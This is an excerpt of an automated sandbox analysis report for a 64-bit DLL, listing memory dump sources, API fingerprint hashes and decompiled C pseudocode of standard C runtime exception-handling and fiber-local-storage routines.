                                                                      0x180058e45
                                                                      0x180058e47
                                                                      0x180058e4c
                                                                      0x180058e53
                                                                      0x180058e71

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9672a7db9e5d2074402094157004e9d745d20475ce8d6a8b0f001699c775eb19
                                                                      • Instruction ID: 01bc4e7c8d0c173781f541b9fa60b376af4ddb86d5f1b32e7024f46db2dc0675
                                                                      • Opcode Fuzzy Hash: 9672a7db9e5d2074402094157004e9d745d20475ce8d6a8b0f001699c775eb19
                                                                      • Instruction Fuzzy Hash: 52110A32604E0D41FAE62124E9573E91060AF5D3F4F04C624BD7A363E6CF2A4B4DA301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D24F
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D26E
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D296
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D2A7
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D2B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 1b88299e96af691b6db6411e19ae04952ecc5c11556246a97cd16452aea85548
                                                                      • Instruction ID: 02f15b5cbb9cf141e189c0bcaa582931cf1889448a77bf2393b37eb9c57266c0
                                                                      • Opcode Fuzzy Hash: 1b88299e96af691b6db6411e19ae04952ecc5c11556246a97cd16452aea85548
                                                                      • Instruction Fuzzy Hash: 6711603070474C41FAEBA325A5913FB23526B9C3F4F56C326B879467D7DE28C64A8300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 912b17cfdb036672fb25a0515c9b335ac647c9678857b52d54781a4a8650978c
                                                                      • Instruction ID: 707b21bfd7368a437bdbefb57e6ab63407ad2205a3ac835a8d2c6df98ad4671b
                                                                      • Opcode Fuzzy Hash: 912b17cfdb036672fb25a0515c9b335ac647c9678857b52d54781a4a8650978c
                                                                      • Instruction Fuzzy Hash: 4811543030060841F9EBA33555517FB17816B8C3F4F1AC735B93A863C7DD2886494301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 9cf78734415ad5f28745d1543aca8f60120bff2395824cd3e85abb58f315948b
                                                                      • Instruction ID: 47b839bd1d797c5d88daa617e69d1427dc664eaeb7e219eae484c38241f36458
                                                                      • Opcode Fuzzy Hash: 9cf78734415ad5f28745d1543aca8f60120bff2395824cd3e85abb58f315948b
                                                                      • Instruction Fuzzy Hash: EC111E3030060C46F9EFA33568527FB13416B8D7F4E56C726B93A4A3C3DE2996598301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 943ee954952f5e9afd63ff5d22105c795a405d8fc1290ef55c5644839e7ae17b
                                                                      • Instruction ID: 5eca4f79ac6f91b7d550d33930d95a66e8fc04c410d53cc69df73fee5cb1baea
                                                                      • Opcode Fuzzy Hash: 943ee954952f5e9afd63ff5d22105c795a405d8fc1290ef55c5644839e7ae17b
                                                                      • Instruction Fuzzy Hash: CF11E13030064C45F9EBA7355452BFB1B416B9D3F4F6AC735B83A852D3DE29964D8305
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E00000001180010FA0(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t94;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t125;
                                                                      				void* _t136;
                                                                      				intOrPtr _t137;
                                                                      				signed long long _t143;
                                                                      				long long _t145;
                                                                      				long long _t150;
                                                                      				void* _t151;
                                                                      				intOrPtr* _t171;
                                                                      				long long _t182;
                                                                      				long long _t183;
                                                                      				intOrPtr* _t184;
                                                                      				void* _t185;
                                                                      				intOrPtr* _t186;
                                                                      				intOrPtr* _t187;
                                                                      				void* _t188;
                                                                      				signed long long _t189;
                                                                      				intOrPtr _t197;
                                                                      				void* _t204;
                                                                      				long long _t205;
                                                                      
                                                                      				_t187 = _t188 - 0x38;
                                                                      				_t189 = _t188 - 0x138;
                                                                      				_t143 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t187 + 0x28) = _t143 ^ _t189;
                                                                      				_t185 = __r9;
                                                                      				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
                                                                      				_t204 = __rdx;
                                                                      				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
                                                                      				_t186 = __rcx;
                                                                      				 *((long long*)(_t189 + 0x70)) = _t145;
                                                                      				 *((long long*)(_t189 + 0x78)) = __r8;
                                                                      				if ( *__rcx == 0x80000003) goto 0x80011269;
                                                                      				E0000000118000E0F4(_t145);
                                                                      				r12d =  *((intOrPtr*)(_t187 + 0xb0));
                                                                      				r15d =  *((intOrPtr*)(_t187 + 0xa8));
                                                                      				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x80011068;
                                                                      				__imp__EncodePointer();
                                                                      				_t160 = _t145;
                                                                      				E0000000118000E0F4(_t145);
                                                                      				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x80011068;
                                                                      				if ( *__rcx == 0xe0434f4d) goto 0x80011068;
                                                                      				if ( *__rcx == 0xe0434352) goto 0x80011068;
                                                                      				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
                                                                      				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				if (E0000000118000E52C(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x80011269;
                                                                      				E00000001180011A88(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
                                                                      				if ( *_t187 <= 0) goto 0x80011289;
                                                                      				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				r8d = r15d;
                                                                      				_t94 = E0000000118000EB9C(_t145, _t187 - 0x70, _t187, _t185, __rcx, _t187);
                                                                      				asm("movups xmm0, [ebp-0x70]");
                                                                      				asm("movdqu [ebp-0x80], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x80011269;
                                                                      				_t95 =  *((intOrPtr*)(_t187 - 0x78));
                                                                      				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
                                                                      				asm("inc ecx");
                                                                      				asm("dec ax");
                                                                      				asm("movups [ebp-0x80], xmm0");
                                                                      				if (_t95 - r15d > 0) goto 0x800111cf;
                                                                      				_t136 = r15d - _t95;
                                                                      				if (_t136 > 0) goto 0x800111cf;
                                                                      				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
                                                                      				E000000011800119E0( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
                                                                      				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
                                                                      				E000000011800122A4( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
                                                                      				_t150 =  *((intOrPtr*)(_t187 - 0x40));
                                                                      				 *((long long*)(_t187 - 0x48)) = _t150;
                                                                      				E000000011800122A4(_t150, _t187 - 0x50);
                                                                      				if (_t136 == 0) goto 0x80011146;
                                                                      				E000000011800122A4(_t150, _t187 - 0x50);
                                                                      				if (_t136 != 0) goto 0x80011137;
                                                                      				_t137 =  *((intOrPtr*)(_t187 - 0x30));
                                                                      				if (_t137 == 0) goto 0x80011174;
                                                                      				E0000000118000F1DC(_t150);
                                                                      				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
                                                                      				if (_t137 == 0) goto 0x80011174;
                                                                      				if (__edx == 0) goto 0x8001116c;
                                                                      				E0000000118000F1DC(_t151);
                                                                      				goto 0x8001116e;
                                                                      				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x800111c3;
                                                                      				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x800111c3;
                                                                      				 *((char*)(_t189 + 0x58)) = 0;
                                                                      				_t171 = _t186;
                                                                      				 *((char*)(_t189 + 0x50)) = 1;
                                                                      				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
                                                                      				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
                                                                      				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				E000000011800102F0(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
                                                                      				_t197 =  *((intOrPtr*)(_t189 + 0x68));
                                                                      				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x18005f7b0));
                                                                      				 *((long long*)(_t197 + 8)) = _t182;
                                                                      				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x18005f7c0);
                                                                      				_t183 = _t182 -  *((char*)(_t171 + 0x18005f7b0));
                                                                      				 *((long long*)(_t197 + 8)) = _t183;
                                                                      				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x18005f7c0);
                                                                      				_t184 = _t183 -  *((char*)(_t171 + 0x18005f7b0));
                                                                      				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x18005f7c0);
                                                                      				 *((long long*)(_t197 + 8)) = _t184;
                                                                      				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
                                                                      				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
                                                                      				 *((long long*)(_t197 + 8)) = _t184 + 4;
                                                                      				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
                                                                      				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x800110d1;
                                                                      				return E000000011800028F0( *(_t184 - 4) >>  *(_t171 + 0x18005f7c0), _t125,  *(_t187 + 0x28) ^ _t189);
                                                                      			}




























                                                                      0x180010fad
                                                                      0x180010fb2
                                                                      0x180010fb9
                                                                      0x180010fc3
                                                                      0x180010fcd
                                                                      0x180010fd0
                                                                      0x180010fd7
                                                                      0x180010fda
                                                                      0x180010fe1
                                                                      0x180010fe4
                                                                      0x180010fe9
                                                                      0x180010fee
                                                                      0x180010ff4
                                                                      0x180010ff9
                                                                      0x180011000
                                                                      0x18001100c
                                                                      0x180011010
                                                                      0x180011016
                                                                      0x180011019
                                                                      0x180011022
                                                                      0x18001102a
                                                                      0x180011032
                                                                      0x180011044
                                                                      0x18001104c
                                                                      0x180011051
                                                                      0x180011056
                                                                      0x180011062
                                                                      0x180011073
                                                                      0x18001107c
                                                                      0x180011082
                                                                      0x18001108e
                                                                      0x180011093
                                                                      0x18001109a
                                                                      0x18001109f
                                                                      0x1800110a3
                                                                      0x1800110a8
                                                                      0x1800110ad
                                                                      0x1800110b4
                                                                      0x1800110c5
                                                                      0x1800110c8
                                                                      0x1800110cd
                                                                      0x1800110d1
                                                                      0x1800110d6
                                                                      0x1800110db
                                                                      0x1800110e2
                                                                      0x1800110ec
                                                                      0x1800110ef
                                                                      0x180011105
                                                                      0x180011108
                                                                      0x180011115
                                                                      0x180011119
                                                                      0x18001111e
                                                                      0x180011129
                                                                      0x18001112d
                                                                      0x180011135
                                                                      0x18001113b
                                                                      0x180011144
                                                                      0x180011146
                                                                      0x18001114a
                                                                      0x18001114c
                                                                      0x180011155
                                                                      0x180011158
                                                                      0x18001115c
                                                                      0x18001115e
                                                                      0x18001116a
                                                                      0x180011172
                                                                      0x180011178
                                                                      0x18001118a
                                                                      0x18001118f
                                                                      0x180011192
                                                                      0x180011197
                                                                      0x1800111a0
                                                                      0x1800111a5
                                                                      0x1800111ae
                                                                      0x1800111b4
                                                                      0x1800111b9
                                                                      0x1800111be
                                                                      0x1800111c3
                                                                      0x1800111ea
                                                                      0x1800111f2
                                                                      0x1800111f6
                                                                      0x180011211
                                                                      0x180011219
                                                                      0x18001121d
                                                                      0x180011238
                                                                      0x180011240
                                                                      0x180011248
                                                                      0x18001124e
                                                                      0x180011256
                                                                      0x180011258
                                                                      0x18001125c
                                                                      0x180011263
                                                                      0x180011288

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c862343d2316fa02c6cd54abf461de7ba6ee37518df320774ab49dddd1b5ab7a
                                                                      • Instruction ID: 177b2a468dea434123700bd4c63e3ee1dfb0b663efa80ec56a5987105249a0c7
                                                                      • Opcode Fuzzy Hash: c862343d2316fa02c6cd54abf461de7ba6ee37518df320774ab49dddd1b5ab7a
                                                                      • Instruction Fuzzy Hash: 34919073604B988AE796CB65E8403DD7BA0F349788F14811AFF8957B55DF38C299CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00000001180010D88(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                      				void* _t19;
                                                                      				void* _t27;
                                                                      				void* _t36;
                                                                      				void* _t39;
                                                                      				void* _t42;
                                                                      				void* _t43;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				void* _t52;
                                                                      				void* _t54;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      
                                                                      				_t27 = _t45;
                                                                      				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                      				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                      				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                      				_t43 = _t27 - 0x3f;
                                                                      				_t46 = _t45 - 0xc0;
                                                                      				if ( *__rcx == 0x80000003) goto 0x80010e2c;
                                                                      				E0000000118000E0F4(_t27);
                                                                      				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                      				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x80010e47;
                                                                      				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                      				E0000000118000E0F4(_t27);
                                                                      				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x80010e47;
                                                                      				if ( *__rcx == 0xe0434f4d) goto 0x80010e47;
                                                                      				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                      				if ( *__rcx == 0xe0434352) goto 0x80010e4b;
                                                                      				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                      				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                      				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                      				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                      				_t19 = E0000000118000E4D8(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                      				if (_t19 == 0) goto 0x80010e4b;
                                                                      				return _t19;
                                                                      			}















                                                                      0x180010d88
                                                                      0x180010d8b
                                                                      0x180010d8f
                                                                      0x180010d93
                                                                      0x180010da2
                                                                      0x180010da6
                                                                      0x180010dbc
                                                                      0x180010dbe
                                                                      0x180010dc3
                                                                      0x180010dd0
                                                                      0x180010dd4
                                                                      0x180010ddd
                                                                      0x180010de6
                                                                      0x180010def
                                                                      0x180010df8
                                                                      0x180010dfc
                                                                      0x180010e0c
                                                                      0x180010e14
                                                                      0x180010e19
                                                                      0x180010e1e
                                                                      0x180010e23
                                                                      0x180010e2a
                                                                      0x180010e46

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 93c0c9c642dbb9b1de9c6eb21a21f3404a6d68ae2ac55aadb2f15b85174284d9
                                                                      • Instruction ID: a6c6258460330bd3c0a9a2859f94450e93e037db9bf0b140d91fcd2b671c1667
                                                                      • Opcode Fuzzy Hash: 93c0c9c642dbb9b1de9c6eb21a21f3404a6d68ae2ac55aadb2f15b85174284d9
                                                                      • Instruction Fuzzy Hash: 86513737604B888AE762DF65D0803DD77A0F349BC8F248515EF8957B98DB78D299C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00000001180011514(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                      				signed int _v32;
                                                                      				long long _v40;
                                                                      				char _v48;
                                                                      				signed int* _v56;
                                                                      				void* _t55;
                                                                      				intOrPtr _t60;
                                                                      				signed int _t101;
                                                                      				void* _t109;
                                                                      				intOrPtr _t111;
                                                                      				signed int* _t116;
                                                                      				intOrPtr* _t136;
                                                                      				void* _t139;
                                                                      				void* _t142;
                                                                      				void* _t144;
                                                                      				void* _t158;
                                                                      				void* _t159;
                                                                      
                                                                      				_t109 = _t144;
                                                                      				 *((long long*)(_t109 + 8)) = __rbx;
                                                                      				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                      				_t136 = __rcx;
                                                                      				_t139 = __r9;
                                                                      				_t159 = __r8;
                                                                      				_t142 = __rdx;
                                                                      				E0000000118000525C(_t55, __r8);
                                                                      				E0000000118000E0F4(_t109);
                                                                      				_t116 = _a40;
                                                                      				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80011596;
                                                                      				if ( *__rcx == 0xe06d7363) goto 0x80011596;
                                                                      				if ( *__rcx != 0x80000029) goto 0x8001157a;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x8001157e;
                                                                      				goto 0x8001157c;
                                                                      				if ( *__rcx == 0x80000026) goto 0x80011596;
                                                                      				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x80011596;
                                                                      				if ((_t116[9] & 0x00000001) != 0) goto 0x80011725;
                                                                      				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x8001162e;
                                                                      				if (_t116[1] == 0) goto 0x80011725;
                                                                      				if (_a48 != 0) goto 0x80011725;
                                                                      				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x8001161b;
                                                                      				if ( *__rcx != 0x80000026) goto 0x800115f9;
                                                                      				_t60 = E0000000118000FB28(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                      				if (_t60 - 0xffffffff < 0) goto 0x80011745;
                                                                      				if (_t60 - _t116[1] >= 0) goto 0x80011745;
                                                                      				r9d = _t60;
                                                                      				E000000011800124E4(_t109, _t142, __r9, _t116);
                                                                      				goto 0x80011725;
                                                                      				if ( *_t136 != 0x80000029) goto 0x8001161b;
                                                                      				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                      				if (r9d - 0xffffffff < 0) goto 0x80011745;
                                                                      				if (r9d - _t116[1] >= 0) goto 0x80011745;
                                                                      				goto 0x800115e9;
                                                                      				E0000000118000E8D4(r9d - _t116[1], _t109, _t116, __r9, __r9, _t116);
                                                                      				goto 0x80011725;
                                                                      				if (_t116[3] != 0) goto 0x80011676;
                                                                      				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0x80011656;
                                                                      				_t101 = _t116[8];
                                                                      				if (_t101 == 0) goto 0x80011656;
                                                                      				E0000000118000F1DC(_t109);
                                                                      				if (_t101 != 0) goto 0x80011676;
                                                                      				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x80011725;
                                                                      				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80011725;
                                                                      				if ( *_t136 != 0xe06d7363) goto 0x800116ec;
                                                                      				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x800116ec;
                                                                      				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x800116ec;
                                                                      				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                      				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x800116ec;
                                                                      				E0000000118000F1F0(_t111);
                                                                      				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x800116ec;
                                                                      				_v32 = _a64 & 0x000000ff;
                                                                      				_v40 = _a56;
                                                                      				_v48 = _a48;
                                                                      				_v56 = _t116;
                                                                      				 *0x8005d348(_t158);
                                                                      				goto 0x8001172a;
                                                                      				_v32 = _a56;
                                                                      				_v40 = _a48;
                                                                      				_v48 = _a64;
                                                                      				_v56 = _t116;
                                                                      				E000000011800103C4(_a48, 0x80000026, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                      				return 1;
                                                                      			}



















                                                                      0x180011514
                                                                      0x180011517
                                                                      0x18001151b
                                                                      0x18001151f
                                                                      0x180011523
                                                                      0x18001152d
                                                                      0x180011530
                                                                      0x180011536
                                                                      0x180011539
                                                                      0x18001153c
                                                                      0x180011541
                                                                      0x180011546
                                                                      0x18001155c
                                                                      0x180011564
                                                                      0x180011568
                                                                      0x18001156e
                                                                      0x180011578
                                                                      0x18001157c
                                                                      0x18001158a
                                                                      0x180011590
                                                                      0x18001159a
                                                                      0x1800115a4
                                                                      0x1800115b2
                                                                      0x1800115bc
                                                                      0x1800115c0
                                                                      0x1800115cc
                                                                      0x1800115d4
                                                                      0x1800115dd
                                                                      0x1800115e3
                                                                      0x1800115ef
                                                                      0x1800115f4
                                                                      0x1800115fb
                                                                      0x1800115fd
                                                                      0x180011605
                                                                      0x18001160f
                                                                      0x180011619
                                                                      0x180011624
                                                                      0x180011629
                                                                      0x180011632
                                                                      0x180011640
                                                                      0x180011642
                                                                      0x180011646
                                                                      0x180011648
                                                                      0x180011654
                                                                      0x180011662
                                                                      0x180011670
                                                                      0x18001167c
                                                                      0x180011682
                                                                      0x18001168b
                                                                      0x18001168d
                                                                      0x180011695
                                                                      0x180011697
                                                                      0x1800116aa
                                                                      0x1800116b7
                                                                      0x1800116c9
                                                                      0x1800116d8
                                                                      0x1800116df
                                                                      0x1800116e4
                                                                      0x1800116ea
                                                                      0x1800116f7
                                                                      0x180011709
                                                                      0x180011717
                                                                      0x18001171b
                                                                      0x180011720
